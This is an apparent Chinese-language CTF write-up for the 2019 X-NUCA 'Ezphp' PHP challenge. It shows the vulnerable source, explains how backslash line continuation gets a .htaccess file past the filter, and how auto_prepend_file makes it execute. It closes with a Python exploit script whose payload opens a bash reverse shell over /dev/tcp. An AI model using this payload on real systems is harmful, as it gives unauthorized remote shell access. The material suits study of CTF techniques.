2019Xnuca Ezphp WP
这次不是滑水,是被难住了,时间都花在了Ezphp上,简单纪录一下
首先贴一下题目源码:
#index.php
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
include_once("fl3g.php");
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nJust one chance");
?>
题目的逻辑很简单,访问的时候清除该目录下除了index.php文件以外的所有文件,主要就是两个正则,而且只有一次写的机会,因为想要第二次写的话,就会把第一次写的东西给清了
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
文件名限制了只能是[a-z]和‘.’,而且题目环境设置了只有index.php文件解析,其他php文件不解析,本来想着绕过这个正则建立一个fl3g.php,用条件竞争来文件包含,奈何文件名的正则绕不过去,那就只能考虑绕content的正则了,只要关键字不被匹配到就能过,所以思路就是把关键字拆开,而且新建的php文件都不解析,所以首先想到的就是写一个.htaccess文件。
写.Htaccess文件的困难主要在于过滤了file,on,type之类的,而且文件后追加了\nJust one chance,没有办法注释的话,htaccess文件会出错,所以所有的功夫都用在绕过这两个点上。
参考:https://blog.csdn.net/cool_flag/article/details/78980097
利用添加 \ 的方法来换行书写,利用这种方法来处理过滤的关键字,输出的代码恰好会有不可见字符,正则匹配的时候是分开的,而逻辑上又是一行拼接在一起的一个完整的关键字,所以可以绕过过滤,例如file可以通过如下方式绕过
Fi\
Le
这样就可以绕过content的内容限制,而对于\nJust one chance也是利用同样的绕过方法,在内容末尾加上#\来注释后面的内容。只有一次写的机会自然不能用AddType application/x-httpd-php .xxx的方式,这样需要再写一个文件进去。
参考文章:https://bbs.pediy.com/thread-222907.htm,将代码写在htaccess文件里,利用php_value auto_prepend_file .htaccess让php文件包含htaccess文件,htaccess里的代码会执行,所以直接用反弹shell的方式简单粗暴一些,可以以利用404、403等页面来触发。
import requests
url = 'http://02cdf9ef40d440d1bd0ba727da4b348c21ce0e526eea4fad.changame.ichunqiu.com/'
payload = '?filename=.htaccess&content=php_value%20auto_prepend_fi\\%0Ale%20".htaccess"\n%23<?php system(\'bash -c "/bin/bash -i >%26 /dev/tcp/ip/port 0<%261"\');?>\\'
url2 = url + payload
r = requests.get(url2)
req = request.get(url)
vpss上监听一个端口,跑下脚本就可以收到反弹回来的shell,接下来找flag就好了,没想到的是竟然放在/root/下......